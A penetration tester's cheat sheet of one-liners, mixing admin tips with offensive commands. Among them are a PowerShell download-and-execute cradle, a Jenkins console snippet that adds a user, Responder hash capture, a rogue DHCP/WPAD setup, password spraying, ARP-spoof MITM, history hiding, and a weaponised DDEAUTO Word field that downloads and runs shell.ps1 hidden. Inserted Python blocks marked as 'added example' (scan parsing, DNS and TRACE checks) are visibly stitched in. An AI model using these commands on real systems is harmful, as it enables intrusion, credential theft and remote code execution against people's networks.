Scribbles – notes and oneliners for infosec

Poor-man’s ping sweep on Windows:

for /L %A in (1,1,5) do (for /L %B in (0,1,5) do (for /L %C in (0,1,5) do (for /L %D in (0,1,5) do ping -n 1 %A.%B.%C.%D))) >> output.txt

Replace the 5's with the upper bound you want for each octet. Written like this it runs at an interactive prompt; inside a .bat file the loop variables must be doubled (%%A, %%B, ...).

 

Find the domain controller in your local network:

nslookup
set type=all
_ldap._tcp.dc._msdcs.DOMAIN_NAME

Replace DOMAIN_NAME with the actual domain name (shown by systeminfo); the SRV records in the answer name the domain controllers.

 

Jenkins script execution:

// Groovy, pasted into the Jenkins script console
def command = """net user YOURNEWUSER YOURNEWPASSWORD /ADD"""
def proc = command.execute()
proc.waitFor()

println "stdout: ${proc.in.text}"

 

Download and execute via PowerShell:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://1.2.3.4:8000/SomeScript.ps1');Invoke-SomeMethod -SomeParameter SomeValue"

 

Generate all numbers from zero to 200 with equal width (leading zeroes):

seq -w 0 1 200

 

Generating usernames when convention is known:

echo -e {a..z}{A..Z}{0..9}| sed 's/ /\r\n/g'

 

Post-exploitation activities in order of noisiness:

  • Responder when on a busy network
    • sudo python Responder.py -i 1.2.3.4 -I eth0 -rdfw
      • Crack hashes
        • john Responder/logs/SMB-NTLMv2-SSP-1.2.3.4.txt --wordlist=BigPasswordList --rules
        • hashcat64.exe --remove -a 0 -m 5500 -o Cracked.txt hashes.txt Passwords.txt -r d3adhob0.rule.txt
  • Rogue DHCP server on the network (from the Responder package)
    • sudo python DHCP.py -I eth0 -r GATEWAYIP -p ATTACKERIP -s 127.0.1.1 -n 255.SUB.NET.MASK -d "DOMAIN_NAME" -w "http://ATTACKERIP/wpad.dat"
  • CrackMapExec for local admin account with weak default password
    • sudo cme smb smb-targets -u Administrator -p password --local-auth
  • CrackMapExec when username convention is known
    • sudo cme smb smb-targets -u usersinfile -p defaultpassword
  • Grab the frontpage of common web application ports (one loop over the per-port masscan output files; port 443 is fetched over https, and the wget log is appended to instead of being overwritten on every iteration)
    • for port in 80 443 8080 7001 8085 8090 8081 ; do scheme=http ; [ "$port" = 443 ] && scheme=https ; while read line ; do wget "$scheme://$line:$port" --no-check-certificate -T 5 -t 2 -O "frontpages/$line-$port.html" -a logfile.txt ; done < "1.2.3.4-masscan-port-$port-ips" ; done
  • Masscan of select ports
    • masscan -p 0-65535 1.2.3.4/24 --rate=40000 -oG 1.2.3.4-masscan-port-all

 

Get most commonly occurring ports on the network after a full masscan:

cat 1.2.3.4-masscan-port-all |awk '{print $3}' | sort | uniq -c | sort -n > top-ports
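An added example (not from the page): the same tally in Python. It locates the Host: and Ports: fields by their labels instead of by column number, so a timestamp or other leading column cannot silently shift what gets counted, it counts a host once per port even when masscan logged the hit twice, and it also answers "which hosts expose port X". The sample lines are constructed in the layout assumed here for masscan -oG output; they are not real scan data.

```python
"""Tally open ports per host from masscan grepable (-oG) output."""
from collections import Counter
from typing import Dict, Iterable, List, Tuple

# Constructed sample in the layout assumed here for masscan -oG lines:
# "Timestamp: <epoch>\tHost: <ip> ()\tPorts: <port>/<state>/<proto>////"
SAMPLE_OG = """\
# Masscan scan initiated (constructed sample, not real scan data)
Timestamp: 1700000000\tHost: 10.0.0.5 ()\tPorts: 80/open/tcp////
Timestamp: 1700000001\tHost: 10.0.0.5 ()\tPorts: 443/open/tcp////
Timestamp: 1700000002\tHost: 10.0.0.9 ()\tPorts: 80/open/tcp////
Timestamp: 1700000002\tHost: 10.0.0.9 ()\tPorts: 80/open/tcp////
Timestamp: 1700000003\tHost: 10.0.0.12 ()\tPorts: 8080/open/tcp////
Timestamp: 1700000004\tHost: 10.0.0.12 ()\tPorts: 80/open/tcp////
garbage line without the expected labels
# Masscan done
"""

Record = Tuple[str, int, str, str]  # (host, port, state, proto)


def parse_grepable(lines: Iterable[str]) -> List[Record]:
    """Extract (host, port, state, proto) from each result line.

    Fields are found by their 'Host:' / 'Ports:' labels instead of by
    column number, so an extra or missing leading column (the Timestamp
    field, for instance) does not shift what the tally counts."""
    records: List[Record] = []
    for line in lines:
        tokens = line.strip().split()
        if not tokens or tokens[0].startswith("#"):
            continue
        try:
            host = tokens[tokens.index("Host:") + 1]
            ports_field = tokens[tokens.index("Ports:") + 1]
        except (ValueError, IndexError):
            continue  # malformed line: skip it rather than miscount
        for entry in ports_field.split(","):
            parts = entry.split("/")
            if len(parts) < 3 or not parts[0].isdigit():
                continue
            records.append((host, int(parts[0]), parts[1], parts[2]))
    return records


def top_ports(records: Iterable[Record], only_open: bool = True) -> List[Tuple[int, int]]:
    """(port, number_of_hosts) pairs, most common first, ties ordered by port.
    A host is counted once per port even if masscan logged the hit twice."""
    seen = {(h, p) for h, p, state, _ in records if not only_open or state == "open"}
    counts = Counter(p for _, p in seen)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def hosts_by_port(records: Iterable[Record]) -> Dict[int, List[str]]:
    """Which hosts expose each open port, in first-seen order."""
    out: Dict[int, List[str]] = {}
    for h, p, state, _ in records:
        if state == "open" and h not in out.setdefault(p, []):
            out[p].append(h)
    return out


if __name__ == "__main__":
    recs = parse_grepable(SAMPLE_OG.splitlines())
    for port, n in top_ports(recs):
        print(f"{n:4d}  {port}")
```

Feed it a real file with `parse_grepable(open("1.2.3.4-masscan-port-all"))`; the label-based lookup is the reason to prefer this over `awk '{print $3}'` when you are not sure which column the port lands in.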

 

Decompile JNLP applications:

  • Download the JNLP file, open it up, copy all JAR-file URLs into a file
  • Run through the file and download all the JARs
  • ls *.jar > jars && while read line; do unzip "$line" -d "$line-unpacked"; done < jars
  • Decompile the JARs with your favorite tool

 

Man-In-The-Middle without GUI tools:

  • sudo apt-get install dsniff
  • sudo arpspoof -i <your NIC> -t <the IP you want to grab data from> <the IP you want to impersonate (usually the gateway)>
  • All traffic will now end up on your computer. To automatically forward said traffic, run the following command: sudo sysctl net.ipv4.conf.all.forwarding=1
  • Traffic is now being forwarded. To see if you already have this enabled, run this: sysctl -a | grep forward
  • To disable it, just set forwarding=0
  • Now you can run Wireshark or tcpdump and sniff the traffic.

 

Man-In-The-Middle’ing web applications:

So you've successfully MITM'ed a host on the network. Now you can do all sorts of stuff and intercept traffic and files and what-not, but how about not just intercepting it, but altering it? More precisely, let's say you want to intercept and alter every request made to a website?

This can be done with some iptables magic and the Burp proxy.

On a linux box, execute the following:

iptables -F -t nat
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j DNAT --to 192.168.0.5:8080

This makes everything received on eth0 and headed for port 443 pass through the proxy you have listening on 192.168.0.5:8080.

When you're done, in my experience it's easier to just clear the iptables rules and re-run your usual setup script, rather than picking out the lines you've just entered.

 

Get linecount for code review estimation:

find "$(pwd)" -iname '*.java' > files.txt && while read line ; do wc -l "$line" ; done < files.txt > counts.txt && rm files.txt && cat counts.txt | cut -d" " -f1 > numbers.txt && rm counts.txt && sum=0 ; while read num ; do sum=$(($sum + $num)) ; done < numbers.txt ; echo $sum && rm numbers.txt

 

Diffing files and folders:

diff -E -b -B -r -q <folder1> <folder2>    lists only the files that differ
diff -E -b -B -r <folder1> <folder2>       shows the actual differences

 

DNS cache snooping:

dig @<dns-server-ip> <domain-to-lookup> A                (regular lookup)

dig @<dns-server-ip> <domain-to-lookup> A +norecurse     (cached lookup: recursion is switched off, so an answer means the name was already in the server's cache)

 

Split string on delimiters:

cut -d ':' -f 2 twitter.txt

This splits on the : character and prints the second field, i.e. what follows the colon (use -f 2- to keep everything after the first colon when a line contains several); -f 1 keeps the part before the delimiter instead.

 

How to tar certain filetypes recursively

find . -type f -iname '*.exe' > all_exe_files.txt
tar -cf tar.tar -T all_exe_files.txt

find is used instead of ls -R because ls -R prints bare file names without their directories, so tar could not locate files in subfolders; -T reads the file list directly, so there is no need to seed the archive with a first file and append the rest.

 

Verify if SSL session caching is enabled

openssl s_client -connect <ip:port> -reconnect
if the session IDs are the same, it’s enabled.

Verify if HTTP DEBUG is enabled in a oneliner

echo -e “DEBUG /page.aspx HTTP/1.0\r\nCommand: stop-debug\r\n\r\n” | openssl s_client -connect <ip>:<port> -quiet
if it returns 200 OK, it’s enabled

How to verify weak IPSec settings

ike-scan <ip> --trans="(1=x,2=y,3=z,4=w)"
where x=encryption algorithm, y=hash, z=auth, w=DH group.
see nta-monitor.com/wiki

 

DNS amplification DoS

dig . NS @<ip>
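An added example, not from the page, that does in Python what the two dig invocations do: the +norecurse probe from the DNS cache snooping section above and the root-NS check in this section. build_query() writes the query on the wire by hand so the RD bit that +norecurse clears is visible, parse_header() decodes the flags, and the two verdict functions spell out which flags each check rests on. The reply headers at the bottom are constructed sample data, not captured traffic; query() is the only function that touches the network and is there to check a resolver you operate.

```python
"""Hand-built DNS queries: the non-recursive probe (+norecurse) and the
root-NS check, with the reply flags that decide each verdict."""
import random
import socket
import struct
from typing import Dict, Optional

QTYPE_A, QTYPE_NS = 1, 2
RCODE_NOERROR, RCODE_REFUSED = 0, 5


def build_query(name: str, qtype: int = QTYPE_A, recursion_desired: bool = True,
                txid: Optional[int] = None) -> bytes:
    """Encode a one-question DNS query (RFC 1035 wire format).

    recursion_desired=False clears the RD bit, which is what dig +norecurse
    does: a well-behaved resolver then answers only from what it already
    holds in its cache instead of fetching the record for us."""
    if txid is None:
        txid = random.randrange(0, 0x10000)
    flags = 0x0100 if recursion_desired else 0x0000            # only RD may be set
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)  # QD=1, AN/NS/AR=0
    labels = [l for l in name.strip(".").split(".") if l]     # "." -> no labels (root)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)       # QCLASS 1 = IN


def parse_header(reply: bytes) -> Dict[str, int]:
    """Decode the 12-byte header; the flag bits are what both checks rely on."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", reply[:12])
    return {"id": txid, "qr": (flags >> 15) & 1, "aa": (flags >> 10) & 1,
            "rd": (flags >> 8) & 1, "ra": (flags >> 7) & 1, "rcode": flags & 0xF,
            "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar}


def snoop_verdict(hdr: Dict[str, int]) -> str:
    """Read a reply to a non-recursive query: records in the answer section
    mean the name was already in the server's cache."""
    if hdr["rcode"] == RCODE_REFUSED:
        return "refused"        # server will not serve this client at all
    if hdr["rcode"] == RCODE_NOERROR and hdr["ancount"] > 0:
        return "cached"
    return "not-cached"         # empty answer or a referral (NS records only)


def is_open_resolver(hdr: Dict[str, int]) -> bool:
    """A root-NS reply carrying answers with RA set means the server recurses
    for arbitrary clients, the property amplification abuses and the one a
    resolver operator wants to see come back False from the outside."""
    return hdr["rcode"] == RCODE_NOERROR and hdr["ra"] == 1 and hdr["ancount"] > 0


def query(server: str, name: str, qtype: int = QTYPE_A,
          recursion_desired: bool = True, timeout: float = 3.0) -> Dict[str, int]:
    """Send one UDP query and return the parsed reply header (network call)."""
    packet = build_query(name, qtype, recursion_desired)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(packet, (server, 53))
        reply, _ = s.recvfrom(4096)
    hdr = parse_header(reply)
    if hdr["id"] != struct.unpack("!H", packet[:2])[0]:
        raise ValueError("reply transaction id does not match the query")
    return hdr


# Constructed reply headers (flags and counts only; no record data is needed here).
CACHED_REPLY = struct.pack("!HHHHHH", 0x1234, 0x8080, 1, 1, 0, 0)       # QR+RA, 1 answer
UNCACHED_REPLY = struct.pack("!HHHHHH", 0x1234, 0x8080, 1, 0, 4, 0)     # referral: 4 NS, 0 answers
OPEN_ROOT_REPLY = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 13, 0, 0)   # 13 root NS, RA set
REFUSED_REPLY = struct.pack("!HHHHHH", 0x1234, 0x8105, 1, 0, 0, 0)      # rcode 5, no RA
```

Usage against a live server is `snoop_verdict(query("<dns-server-ip>", "<domain-to-lookup>", recursion_desired=False))` and `is_open_resolver(query("<ip>", ".", QTYPE_NS))`; the same builder with qtype 33 (SRV) also fetches the _ldap._tcp.dc._msdcs record from the domain controller section.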

How to verify if TRACE is enabled

telnet to the server and send:
TRACE / HTTP/1.0
XST: <some number>
TC: <some number>
<enter>
If TRACE is enabled the server answers 200 OK and echoes the request back, XST and TC headers included.
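As an added example that is not from the page, both checks (the DEBUG oneliner above and this TRACE recipe) in Python, using the page's XST/TC marker headers. The difference from just watching for 200 OK is that method_enabled() requires the TRACE body to reflect the marker, because a catch-all handler can return 200 to any verb without TRACE being on. The responses at the bottom are constructed sample data; probe() is the only function that opens a connection, for checking servers you administer.

```python
"""Probe an HTTP server for the TRACE and DEBUG verbs and decide from the
response whether the method is really enabled."""
import socket
import ssl
from typing import Dict, Tuple

MARKER = "12345"   # value sent in the XST/TC headers; TRACE must echo it back


def build_request(method: str, host: str, path: str = "/", marker: str = MARKER) -> bytes:
    """Raw HTTP/1.0 request. TRACE carries the XST/TC marker headers from the
    telnet recipe; DEBUG carries the Command header from the openssl oneliner."""
    lines = [f"{method} {path} HTTP/1.0", f"Host: {host}"]
    if method == "TRACE":
        lines += [f"XST: {marker}", f"TC: {marker}"]
    elif method == "DEBUG":
        lines.append("Command: stop-debug")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_response(raw: bytes) -> Tuple[int, Dict[str, str], bytes]:
    """Split a raw response into (status code, lowercase header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    head_lines = head.decode("iso-8859-1").split("\r\n")
    parts = head_lines[0].split(" ", 2)
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    headers: Dict[str, str] = {}
    for line in head_lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def method_enabled(method: str, status: int, body: bytes, marker: str = MARKER) -> bool:
    """TRACE is only confirmed when the 200 body reflects our marker header
    (a 200 from a handler that ignores the verb does not count).
    For DEBUG the 200 OK itself is the confirmation, as the page says."""
    if status != 200:
        return False
    if method == "TRACE":
        return f"XST: {marker}".encode("ascii") in body
    return True


def probe(host: str, port: int, method: str = "TRACE", use_tls: bool = True,
          path: str = "/", timeout: float = 5.0) -> Dict[str, object]:
    """Send the request to a live server (network call) and return the verdict."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False          # we are testing the verb, not the certificate
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(build_request(method, host, path))
        chunks = []
        while True:                         # HTTP/1.0: server closes when done
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    status, headers, body = parse_response(b"".join(chunks))
    return {"method": method, "status": status, "allow": headers.get("allow", ""),
            "enabled": method_enabled(method, status, body)}


# Constructed responses (not captured traffic) showing the possible outcomes.
TRACE_REFLECTED = (b"HTTP/1.1 200 OK\r\nContent-Type: message/http\r\n\r\n"
                   b"TRACE / HTTP/1.0\r\nHost: example.test\r\nXST: 12345\r\nTC: 12345\r\n\r\n")
TRACE_BLOCKED = b"HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n\r\n"
TRACE_IGNORED = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>home</html>"
DEBUG_OK = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
```

Run it as `probe("<ip>", <port>, "TRACE")` or `probe("<ip>", <port>, "DEBUG", path="/page.aspx")`; the returned allow field shows what the server itself claims to accept, which is useful when the verdict is False but you expected otherwise.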

 

Show iptables rules and policies

iptables -L -n --line-numbers

 

Kill process in Windows running under admin-user

runas /user:<domain>\<username> cmd
wmic process where name="process.exe" delete

 

Linux get filesize

du <folder> -hc | grep total

 

Allow local user access via SSH

nano /etc/ssh/sshd_config
find the line "DenyUsers <username>"
and put a # in front of it.
restart sshd

 

Hide shell history

unset HISTFILE

 

How to run commands as admin on Windows

open a command prompt and type: runas /user:[DOMAIN]\[USER] [COMMAND]

 

Reconnecting a client to WSUS

wuauclt /resetauthorization /detectnow

 

Force update of GPO

gpupdate /force

 

Grepping through everything

grep -rail    - recursive, treat everything as text, case insensitive, list only the files that match

 

Convert epoch to human format (gawk's strftime; the third argument, 1, prints the time in UTC):

cat access.log | awk '{$1=strftime("%F %T", $1, 1); print $0}'

Example:

date +%s | awk '{$1=strftime("%F %T", $1, 1); print $0}'

 

DDE macro-less exploitation:

In word, press ctrl+F9 to insert a field. Right click and enable field codes. Enter the following code:

DDEAUTO "APPLICATION_NAME" " \\..\\Windows\\ABCDEFGHIJKLMNOPQRSTUVXYZ\\..\\System32\\calc.exe" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABC"

APPLICATION_NAME is the name of the application that Word will ask you if you want to start

ABCDEFGHJ… is the remote data that Word will report as inaccessible. If you don't use all the characters, you need to pad with \\..'s

System32\\calc.exe is of course the payload.

AAAAAAAAAAA is the error explanation shown when your payload executes. The less you pad before ABCDEFG the more characters you have for this message

The more you pad, the less room there is for your payload. This is my go-to DDEAUTO, without any attempt at hiding it:

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -w Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://mydomain/shell.ps1');powershell $e